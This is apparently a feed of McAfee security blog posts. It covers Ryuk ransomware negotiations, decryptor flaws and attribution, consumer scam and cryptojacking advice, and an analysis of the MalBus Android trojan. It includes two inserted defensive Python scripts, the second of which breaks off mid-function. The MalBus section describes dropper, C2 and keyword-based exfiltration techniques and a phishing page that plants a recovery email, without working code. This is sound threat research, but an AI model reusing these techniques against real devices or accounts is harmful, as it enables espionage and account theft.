One reply did contain quite a remarkable expression, “à la guerre comme à la guerre,” used to contextualize the methods and reasons for the cyber criminals’ attacks on western companies. The French expression originates from the seventeenth century; it literally translates to “in war as in war” and loosely to “in harsh times one has to make do with what’s available”. The striking thing about this expression is that it is prominently featured in volume 30 of the collected works of the Soviet Revolutionary leader Vladimir Lenin. Lenin uses the expression to describe the struggle of his people during the war against western capitalism.

This concept of “The capitalistic West versus the Poor east” is actually something McAfee ATR sees quite often expressed by cyber criminals from some of the Post-Soviet republics. This expression may be a clear indicator of the origin and cultural view of the criminals behind Ryuk.

Ryuk poses existential risk to certain industries

Even though the average ransom discounts of Ryuk are large (~60%), the absolute level of the ransom is extreme. Accordingly, we have seen evidence that links ransom demands to the size of the network footprint of the victim company. However, this doesn’t mean that the ransom demand correlates to the victim’s actual operational and financial size.

Companies in the IT Hosting and the Freight and Logistics industries have been particularly susceptible to this discrepancy. Coveware has assisted at least 3 companies that have had to unwind their business when an affordable ransom amount could not be reached. Typically, downtime costs are 10x the ransom amount, but in these industries downtime costs can be particularly extreme.

IT Hosting companies are of note as the size and number of their servers can make them appear like a large organization. Unfortunately, the business of hosting involves high fixed costs, low operating margins, and zero tolerance of downtime by end clients. Hosting companies that get attacked typically have a few hours to restore service before their clients drop them for alternatives. Moreover, these companies suffer irreparable harm to their reputations, and may trigger SLA breaches that leave them exposed to liability. The inability to pay a six-figure ransom has caused multiple hosting companies to shut down.

Freight and Logistics firms are also acutely exposed. These firms also present like larger firms given the volume of data they move and their network footprint. Additionally, attacks against Freight and Logistics firms can cause immediate supply chain issues for the victims’ end clients, who are subsequently forced to route through other service providers. Similar to IT Hosting, Freight and Logistics firms have low operating margins and end clients with little tolerance for service interruptions. The inability to pay or negotiate a large ransom has materially impacted several firms in this industry.

Ryuk Decryptor findings and issues

When victims do pay the exorbitant ransom amount, the criminals provide a decryptor to unlock their files. This decryptor is actually a framework that needs to be loaded with a victim’s private RSA key, provided by the criminals, in order to decrypt, ensuring that the provided decryptor will only work for this specific victim. This setup allows the criminals to quickly load a victim’s key into the framework and offer a custom decryptor with minimal code change while the underlying framework remains the same.

From Coveware’s experience we have learned that the decryption process is quite cumbersome and full of possible fatal errors. Luckily Coveware was able to share the Ryuk decryptor with McAfee ATR in order to take a closer look at the issues and level of sophistication of the decryptor.

Once launched, the first thing the decryptor does is search the HKEY_CURRENT_USER hive for a value named “svchos” under the key “SOFTWARE\Microsoft\Windows\CurrentVersion\Run” and delete that specific entry. This removes the persistence of the malware. Afterwards it will reboot the system and remove any remaining Ryuk malware still residing on the system.

Deleting the “svchos” value from the registry.

Once rebooted the user needs to run the tool again and the decryptor will provide two options to decrypt.

  • Decryption per file
  • Automatic decryption

The main interface of the Ryuk decryptor with the different menu options.

HERMES File Marker

During the decryption process we have found that the decryptor searches for the known file marker string HERMES which is located in the encrypted file.

The HERMES marker clearly visible within the file

The fact that Ryuk ransomware adds the HERMES file marker string was already known, but discovering this specific check routine in the decryptor further strengthens the hypothesis that Ryuk is a slightly modified version of the Hermes2.1 ransomware kit that is sold online.

Decryptor Issues

While examining the decryptor we were astonished by the lack of sophistication and the number of errors that resided within the code. Some of the most prominent issues were:

  • If there is a space in the Windows file path the decryptor will fail the decryption process.
  • If there is a quotation mark (") in the file path the decryptor will report an error that it cannot find the specific file.
  • The decryptor uses the “GetVersionExW” function to determine the Windows version; from Windows 8.1 onwards the value returned by this API has changed, and the decryptor isn’t designed to handle the new value.
  • The decryptor doesn’t remove the .RYUK extension and replace it with the original extension. So, there is no way the name of the file can give an indication towards the type of the file, something that can be extremely labor intensive for enterprise victims.
  • When choosing the manual option in the decryptor, the user has to supply a path of the specific file or choose “0” to finish. However, choosing a “0” will put the decryptor into an infinite loop.

Looking at the decryptor, it is very worrisome to see that the criminals behind Ryuk can get away with such bad programming. It shows a clear lack of empathy towards their victims and the absence of solid coding skills. Victims who do pay the exorbitant ransom demand are far from in the clear. The decryptor offered by the criminals has a very high risk of malfunctioning, resulting in permanent damage to their precious files. Victims should always make an exact copy of the encrypted hard disk before trying to use the decryptor.
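The advice above (copy the encrypted disk first, expect the decryptor to choke on paths with spaces or quotes, and expect the .RYUK suffix to remain) can be turned into a pre-flight check a responder runs before touching the criminals’ tool. This is an added example, not McAfee’s or Coveware’s code; it assumes only what the post states (HERMES marker somewhere in the file, .RYUK extension), and the sample tree it builds is constructed.

```python
"""Pre-flight triage before running a vendor-supplied Ryuk decryptor.

Added example (not McAfee's or Coveware's code). Assumptions taken from the
post: encrypted files carry the HERMES marker string and the .RYUK extension;
the decryptor fails on paths containing a space or a double quote and never
restores the original extension.
"""
import hashlib
import shutil
import tempfile
from pathlib import Path

ENCRYPTED_SUFFIX = ".RYUK"
HERMES_MARKER = b"HERMES"
# Characters the decryptor is reported to mishandle in a file path.
BAD_PATH_CHARS = {" ": "space", '"': "double quote"}


def sha256_of(path: Path) -> str:
    """Hex SHA-256 of a file, read in chunks so large files are fine."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def has_hermes_marker(path: Path) -> bool:
    """True if the HERMES marker occurs anywhere in the file. The post does not
    say where the marker sits, so the whole file is searched (assumption)."""
    return HERMES_MARKER in path.read_bytes()


def path_issues(path) -> list:
    """Labels for every decryptor-breaking character found in a path string."""
    text = str(path)
    return [label for ch, label in BAD_PATH_CHARS.items() if ch in text]


def original_name(name: str) -> str:
    """Strip the .RYUK suffix so the original extension is visible again
    (the decryptor leaves it in place, so this is a post-decryption step)."""
    if name.endswith(ENCRYPTED_SUFFIX):
        return name[: -len(ENCRYPTED_SUFFIX)]
    return name


def preflight(root) -> dict:
    """Inventory encrypted files under root and flag the ones the decryptor is
    likely to choke on. Hashes are recorded so a backup copy can be verified."""
    base = Path(root)
    report = {"encrypted": [], "no_marker": [], "bad_paths": {}, "hashes": {}}
    for path in sorted(base.rglob("*" + ENCRYPTED_SUFFIX), key=str):
        if not path.is_file():
            continue
        rel = path.relative_to(base).as_posix()
        report["encrypted"].append(rel)
        report["hashes"][rel] = sha256_of(path)
        if not has_hermes_marker(path):
            # .RYUK name but no marker: not a Ryuk-encrypted file as described
            report["no_marker"].append(rel)
        issues = path_issues(rel)
        if issues:
            report["bad_paths"][rel] = issues
    return report


def make_backup_copy(root) -> str:
    """Copy the encrypted tree aside: the post advises an exact copy of the
    encrypted disk before the decryptor is ever run."""
    dest = tempfile.mkdtemp(prefix="ryuk_backup_")
    shutil.copytree(root, dest, dirs_exist_ok=True)
    return dest


def verify_copy(report: dict, copy_root) -> list:
    """Relative paths whose backup copy is missing or differs from the hash
    recorded by preflight()."""
    base = Path(copy_root)
    bad = []
    for rel, digest in report["hashes"].items():
        copy = base / rel
        if not copy.is_file() or sha256_of(copy) != digest:
            bad.append(rel)
    return bad


def build_sample_case() -> str:
    """Constructed sample tree for demonstration; not real victim data."""
    root = Path(tempfile.mkdtemp(prefix="ryuk_demo_"))
    (root / "finance").mkdir()
    (root / "finance" / "ledger.docx.RYUK").write_bytes(b"\x11" * 64 + HERMES_MARKER)
    (root / "finance" / "q4 report.xlsx.RYUK").write_bytes(b"\x22" * 32 + HERMES_MARKER)
    (root / "notes.txt.RYUK").write_bytes(b"\x33" * 16)  # no marker
    (root / "readme.txt").write_bytes(b"not encrypted")
    return str(root)


if __name__ == "__main__":
    sample = build_sample_case()
    result = preflight(sample)
    for rel in result["encrypted"]:
        print(rel, "->", original_name(Path(rel).name), result["bad_paths"].get(rel, []))
    print("backup mismatches:", verify_copy(result, make_backup_copy(sample)))
```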

Call to action in piecing the different parts together

By combining all the fresh insights with the information that was already discovered by ourselves and industry peers we can start defining our leading hypotheses around Ryuk. Based on this hypothesis, we will actively look for falsifying evidence. We encourage the security community to participate in this process. We realize that only by collaboration can we piece the different parts of the Ryuk puzzle together.

By now it should be without question that involvement of the DPRK is the least likely hypothesis. Our leading hypothesis on Ryuk, until proven otherwise, is:

Ryuk is a direct descendant of Hermes2.1 with slight modifications, based on the code overlap in the ransomware as well as the decryptor. Ryuk is not designed to be used in a large-scale corporate environment, based on all the scalability issues in the decryptor. At this moment there are several actors or actor-groups spreading Ryuk, based on the extortion modus operandi and different communications with the victims. The actors or actor-groups behind Ryuk have a relationship with one of the Post-Soviet republics, based on the Russian found in one of the encrypted files and the cultural references observed in the negotiations. The actors behind Ryuk most likely have an affiliation or relationship with the actors behind Trickbot and, based on their TTPs, are better skilled at exploitation and lateral movement than at pure ransomware development.


In the last seven months Ryuk has proven to be a highly profitable form of ransomware, despite the poor programming behind it and its decryptor. The criminals have proven to be ruthless and several of their victims were forced to wind down their businesses after they were unable to afford the exorbitant ransom.

When a company does give in to the high demands it is extra painful to see a situation occur where they are permanently unable to recover their files due to the faulty decryptor.

A solid data loss prevention strategy still remains the best advice against all forms of ransomware; for general prevention advice please visit NoMoreRansom. Always seek professional assistance when you are faced with a targeted ransomware attack such as Ryuk.

The post Ryuk, Exploring the Human Connection appeared first on McAfee Blogs.

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams, using clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime, delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email, asking you to review a product to get rewards. If you click on the link it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development

McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a transportation application series developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations, bus arrival times and so on. There are a total of four apps in the series, with three of them available from Google Play since 2013 and the other from around 2017. Currently, all four apps have been removed from Google Play while the fake plugin itself was never uploaded to the store. While analyzing the fake plugin, we were looking for initial downloaders and additional payloads – we discovered one specific version of each app in the series (uploaded at the same date) which was dropping malware onto the devices on which they were installed, explaining their removal from Google Play after 5 years of development.

Figure 1. Cached Google Play page of Daegu Bus application, one of the apps in series

When the malicious transportation app is installed, it downloads an additional payload from hacked web servers which includes the fake plugin we originally acquired. After the fake plugin is downloaded and installed, it does something completely different: while posing as a plugin of the transportation application, it installs a trojan on the device, tries to phish users into entering their Google account password, and completely takes control of the device. What is interesting is that the malware uses the native library to take over the device and also deletes the library to hide from detection. It uses names of popular South Korean services like Naver, KakaoTalk, Daum and SKT. According to our telemetry data, the number of infected devices was quite low, suggesting that the final payload was installed on only a small group of targets.

The Campaign

The following diagram explains the overall flow from malware distribution to device infection.

Figure 2. Device infection process

When the malicious version of the transportation app is installed, it checks whether the fake plugin is already installed and, if not, downloads it from the server and installs it. After that, it downloads and executes an additional native trojan binary which is similar to the trojan dropped by the fake plugin. After everything is done, it connects to the C2 servers and handles the received commands.

Initial Downloader

The following table shows information about the malicious version of each transportation app in the series. As the Google Play install counts show, these apps have been downloaded on many devices.

Unlike the clean version of the app, the malicious version contains a native library named “”.

Figure 3. Transportation app version with malicious native library embedded

In the BaseMainActivity class of the app, it loads the malicious library and calls startUpdate() and updateApplication().

Figure 4. Malicious library being loaded and executed in the app

startUpdate() checks whether the app is correctly installed by checking for the existence of a specific flag file named “background.png” and whether the fake plugin is installed already. If the device is not already infected, the fake plugin is downloaded from a hacked web server and installed after displaying a toast message to the victim. updateApplication() downloads a native binary from the same hacked server and dynamically loads it. The downloaded file (saved as is then deleted after being loaded into memory and, finally, it executes an exported function which acts as a trojan. As previously explained, this file is similar to the file dropped by the fake plugin which is discussed later in this post.

Figure 5 Additional payload download servers

Fake Plugin

The fake plugin is downloaded from a hacked web server with file extension “.mov” to look like a media file. When it is installed and executed, it displays a toast message saying the plugin was successfully installed (in Korean) and calls a native function named playMovie(). The icon for the fake plugin soon disappears from the screen. The native function implemented in, which is stored inside the asset folder, drops a malicious trojan to the current running app’s directory masquerading as file. The dropped trojan is originally embedded in the xor’ed, which is decoded at runtime. After giving permissions, the address of the exported function “Libfunc” in the dropped trojan is dynamically retrieved using dlsym(). The dropped binary in the filesystem is deleted to avoid detection and finally Libfunc is executed.

Figure 6 Toast message when malware is installed

In the other forked process, it tries to access the “” file on an installed SD card, if there is one, and if it succeeds, it tries to start the “.KaKaoTalk” activity, which displays a Google phishing page (more on that in the next section). The overall flow of the dropper is explained in the following diagram:

Figure 7. Execution flow of the dropper

Following is a snippet of a manifest file showing that “.KaKaoTalk” activity is exported.

Figure 8. Android Manifest defining “.KaKaoTalk” activity as exported

Phishing in JavaScript

The KakaoTalk class opens a local HTML file, javapage.html, with the user’s email address registered on the infected device automatically filled in to log into their account.

Figure 9. KakaoTalk class loads malicious local html file

The victim’s email address is set to the local page through a JavaScript function setEmailAddress after the page is finished loading. A fake Korean Google login website is displayed:

Figure 10. The malicious JavaScript shows crafted Google login page with user account

We found the following attempts of exploitation of Google legitimate services by the malware author:

  • Steal victim’s Google account and password
  • Request password recovery for a specific account
  • Set recovery email address when creating new Google account

An interesting element of the phishing attack is that the malware authors tried to set their own email as the recovery address on Google’s legitimate services. For example, when a user clicks on the new Google account creation link in the phishing page, the crafted link is opened with the malware author’s email address as a parameter of RecoveryEmailAddress.

Figure 11. The crafted JavaScript attempts to set recovery email address for new Google account creation.

Fortunately for end users, none of the above malicious attempts are successful. The parameter with the malware author’s email address is simply ignored at the account creation stage.


In addition to the Google phishing page, when the “Libfunc” function of the trojan (dropped by the fake plugin or downloaded from the server) is executed, the mobile phone is totally compromised. It receives commands from the following hardcoded list of C2 servers. The main functionality of the trojan is implemented in a function called “doMainProc()”. Please note that there are a few variants of the trojan with different functionality but, overall, they are pretty much the same.

Figure 12. Hardcoded list of C2 servers

The geolocation of the hardcoded C2 servers looks like the following:

Figure 13. Location of C2 Servers

Inside doMainProc(), the trojan receives commands from the C2 server and calls appropriate handlers. Part of the switch block below gives us an idea of what type of commands this trojan supports.

Figure 14. Subset of command handlers implemented in the dropped trojan.

As you can see, it has all the functionality that a typical trojan has: downloading, uploading and deleting files on the device, leaking information to a remote server and so on. The following table explains the supported C2 commands:

Figure 15. C2 Commands

Before entering the command-handling loop, the trojan performs some initialization, such as sending device information files to the server and checking the UID of the device. Only after the UID check returns 1 does it enter the loop.

Figure 16. Servers connected before entering command loop

Among these commands, directory indexing is particularly important. The directory structure is saved in a file named “” and, while indexing the given path on the user’s device, the trojan checks each file against specific keywords; if one matches, it uploads the file to the remote upload server. The keywords are Korean; their English translations are given in the following table:

Figure 17. Search file keywords

By looking at the keywords we can infer that the malware authors were looking for files related to the military, politics and so on. These files are uploaded to a separate server.

Figure 18. Keyword matching file upload server


Applications can easily trick users into installing them and then leak sensitive information. It is also not uncommon to see malware sneak onto the official Google Play store, making it hard for users to protect their devices. This malware was not written for ordinary phishing attempts, but rather for very targeted attacks, searching victims’ devices for files related to the military and politics, likely in an attempt to leak confidential information. Users should only install applications they fully trust, even when downloading from trusted sources.

McAfee Mobile Security detects this threat as Android/MalBus and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit

Hashes (SHA-256)

Initial Downloader (APK)

Fake Plugin (APK)

Trojan (additional payload)

The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

AI & Your Family: The Wows and Potential Risks

Am I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

And there’s tons of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely allow hackers more ease to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of the AI-related scams and warn your family to think about every click — even those from friends.

IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices to steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point of entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Service Provider) since they are often less secure. And, be sure to change the default password and secure your primary network and guest network with strong passwords.

The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blogs.

Cryptojacking Up 4,000% How You Can Block the Bad Guys

Think about it: In the course of your everyday activities — like grocery shopping or riding public transportation — the human body comes in contact with an infinite number of germs. In much the same way, as we go about our digital routines — like shopping, browsing, or watching videos — our devices can also pick up countless, undetectable malware or javascript that can infect our devices.

Which is why it’s possible that hackers may be using malware or script to siphon power from your computer — power they desperately need to fuel their cryptocurrency mining business.

What’s Cryptocurrency?

Whoa, let’s back up. What’s cryptocurrency and why would people rip off other people’s computer power to get it? Cryptocurrencies are virtual coins that have a real monetary value attached to them. Each crypto transaction is verified and added to the public ledger (also called a blockchain). The single public ledger can’t be changed without fulfilling certain conditions. These transactions are compiled by cryptocurrency miners who compete with one another by solving the complex mathematical equations attached to the exchange. Their reward for solving the equation is bitcoin, which in the crypto world can equal thousands of dollars.

Power Surge

Here’s the catch: To solve these complex equations and get to crypto gold, crypto miners need a lot more hardware power than the average user possesses. So, inserting malicious code into websites, apps, and ads — and hoping you click — allows malicious crypto miners to siphon power from other people’s computers without their consent.

While mining cryptocurrency can be a harmless hobby, when malware or site code is attached to drain unsuspecting users’ CPU power it’s considered cryptojacking, and it’s becoming more common.

Are you feeling a bit vulnerable? You aren’t alone. According to the most recent McAfee Labs Threats Report, cryptojacking has grown more than 4,000% in the past year.

Have you been hit?

One sign that you’ve been affected is that your computer or smartphone may slow down or have more glitches than normal. Crypto mining code runs quietly in the background while you go about your everyday work or browsing and it can go undetected for a long time.

How to prevent cryptojacking

Be proactive. Your first line of defense against a malware attack is to use a comprehensive security solution on your family computers and to keep that software updated.

Cryptojacking Blocker. This new McAfee product zeroes in on the cryptojacking threat and helps prevent websites from mining for cryptocurrency (see graphic below). Cryptojacking Blocker is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.


Discuss it with your family. Cryptojacking is a wild concept to explain or discuss at the dinner table, but kids need to fully understand the digital landscape and their responsibility in it. Discuss their role in helping to keep the family safe online and the motives of the bad guys who are always lurking in the background.

Smart clicks. One way illicit crypto miners get to your PC is through malicious links sent in legitimate-looking emails. Be aware of this scam (and many others) and think before you click on any links sent via email.

Stick with the legit. If a website, an app, or pop-up looks suspicious, it could contain malware or javascript that instantly starts working (mining power) when you load a compromised web page. Stick with reputable sites and apps and be extra cautious with how you interact with pop-ups.

Install updates immediately. Be sure to keep all your system software up-to-date when alerted to do so. This will help close any security gaps that hackers can exploit.

Strong passwords. These little combinations are critical to your family’s digital safety and can’t be ignored. Create unique passwords for different accounts and be sure to change out those passwords periodically.

To stay on top of the latest consumer and security threats that could impact your family, be sure to listen to our podcast Hackable? And, like us on Facebook.

The post Cryptojacking Up 4,000% How You Can Block the Bad Guys appeared first on McAfee Blogs.

Ryuk Ransomware Attack: Rush to Attribution Misses the Point

Senior analyst Ryan Sherstobitoff contributed to this report.

During the past week, an outbreak of Ryuk ransomware that impeded newspaper printing services in the United States has garnered a lot of attention. To determine who was behind the attack many have cited past research that compares code from Ryuk with the older ransomware Hermes to link the attack to North Korea. Determining attribution was largely based on the fact that the Hermes ransomware has been used in the past by North Korean actors, and code blocks in Ryuk are similar to those in Hermes.

The McAfee Advanced Threat Research team has investigated this incident and determined how the malware works, how the attackers operate, and how to detect it. Based on the technical indicators, known cybercriminal characteristics, and evidence discovered on the dark web, our hypothesis is that the Ryuk attacks may not necessarily be backed by a nation-state, but rather share the hallmarks of a cybercrime operation.

How McAfee approaches attribution

Attribution is a critical part of any cybercrime investigation. However, technical evidence is often not enough to positively identify who is behind an attack because it does not provide all the pieces of the puzzle. Artifacts do not all appear at once; a new piece of evidence unearthed years after an attack can shine a different light on an investigation and introduce new challenges to current assumptions.

Ryuk attack: putting the pieces together

In October 2017, we investigated an attack on a Taiwanese bank. We discovered the actors used a clever tactic to distract the IT staff: a ransomware outbreak timed for the same moment that the thieves were stealing money. We used the term pseudo-ransomware to describe this attack. The malware was Hermes version 2.1.

One of the functions we often see in ransomware samples is that they will not execute if the victim’s system language is one of the following:

  • 419 (Russian)
  • 422 (Ukrainian)
  • 423 (Belarusian)

That was October 2017. Searching earlier events, we noticed a posting from August 2017 in an underground forum in which a Russian-speaking actor offered the Hermes 2.1 ransomware kit:

What if the actor who attacked the Taiwanese bank simply bought a copy of Hermes and added it to the campaign to cause the distraction? Why go to the trouble to build something, when the actor can just buy the perfect distraction in an underground forum?

In the same underground forum thread we found a post from October 22, 2018, mentioning Ryuk.

This post contains a link to an article in the Russian security magazine (“Hacker”) discussing the emergence of Ryuk and how it was first discovered by MalwareHunterTeam in August 2018. This first appearance came well before last week’s attack on newspaper printing services.

Manga connection

Ryuk, according to Wikipedia, refers to a Japanese manga character from the series “Death Note.” Ryuk apparently drops a death note, a fitting name for ransomware that drops ransom notes.

Ransomware is typically named by its cybercriminal developer, as opposed to the naming of state-sponsored malware, which is mostly done by the security industry. It seems the criminals behind Ryuk are into manga.

The use of manga character names and references is common in the cybercriminal scene. We often come across manga-inspired nicknames and avatars in underground forums.

Technical indicators

Looking at research from our industry peers comparing Ryuk and Hermes, we notice that the functionalities are generally equal. We agree that the actors behind Ryuk have access to the Hermes source code.

Let’s dive a bit deeper into Ryuk and compare samples over the last couple of months regarding compilation times and the presence of program database (PDB) paths:

We can see the PDB paths are almost identical. When we compare samples from August and December 2018 and focus on the checksum values of the executables’ rich headers, they are also identical.
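An added example, not from the post or its authors, of the comparison made above: it decodes a PE’s Rich header (recomputing the key to confirm the header has not been tampered with), reads the PDB path from the RSDS debug record and the COFF compile timestamp, and clusters samples on the Rich key and PDB path. The samples, their comp-id entries and the PDB path are constructed minimal PE images, not Ryuk binaries.

```python
import re
import struct

DANS = int.from_bytes(b"DanS", "little")


def rol32(value, count):
    count &= 31
    value &= 0xFFFFFFFF
    return ((value << count) | (value >> (32 - count))) & 0xFFFFFFFF


def rich_key(dos_region, rich_offset, entries):
    """Rich header key ('checksum') as the MSVC linker computes it: the DanS offset,
    plus each DOS-header/stub byte rotated by its position (e_lfanew excluded),
    plus each (comp_id, count) entry with comp_id rotated by count."""
    csum = rich_offset
    for i in range(rich_offset):
        if 0x3C <= i < 0x40:
            continue
        csum = (csum + rol32(dos_region[i], i)) & 0xFFFFFFFF
    for comp_id, count in entries:
        csum = (csum + rol32(comp_id, count)) & 0xFFFFFFFF
    return csum


def build_sample(entries, timestamp, pdb_path):
    """Constructed minimal PE image: DOS header+stub, Rich header, COFF header, RSDS record.
    Not loadable; just enough structure for the parsers below."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    stub = b"This program cannot be run in DOS mode."
    dos[0x40:0x40 + len(stub)] = stub
    key = rich_key(dos, len(dos), entries)
    rich = struct.pack("<4I", DANS ^ key, key, key, key)  # DanS^key, then three 0^key pads
    for comp_id, count in entries:
        rich += struct.pack("<II", comp_id ^ key, count ^ key)
    rich += b"Rich" + struct.pack("<I", key)
    rich += b"\0" * (-len(rich) % 16)
    struct.pack_into("<I", dos, 0x3C, len(dos) + len(rich))  # e_lfanew -> PE header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 3, timestamp, 0, 0, 0xF0, 0x22)
    debug = b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1) + pdb_path.encode() + b"\0"
    return bytes(dos) + rich + coff + b"\0" * 32 + debug


def parse_rich(data):
    """Locate and decode the Rich header; 'valid' is False when the stored key
    no longer matches the recomputed one (header edited or transplanted)."""
    end = data.find(b"Rich")
    if end < 0 or end + 8 > len(data):
        return None
    key = struct.unpack_from("<I", data, end + 4)[0]
    start = end - 4
    while start >= 0 and struct.unpack_from("<I", data, start)[0] != DANS ^ key:
        start -= 4
    if start < 0:
        return None
    entries = [tuple(v ^ key for v in struct.unpack_from("<II", data, off))
               for off in range(start + 16, end, 8)]
    return {"key": key, "entries": entries, "valid": rich_key(data, start, entries) == key}


def compile_time(data):
    """COFF TimeDateStamp (seconds since the Unix epoch) via e_lfanew."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    return struct.unpack_from("<I", data, pe + 8)[0]


PDB_RE = re.compile(rb"RSDS.{20}([^\x00]{1,260})\x00", re.S)


def pdb_path(data):
    m = PDB_RE.search(data)
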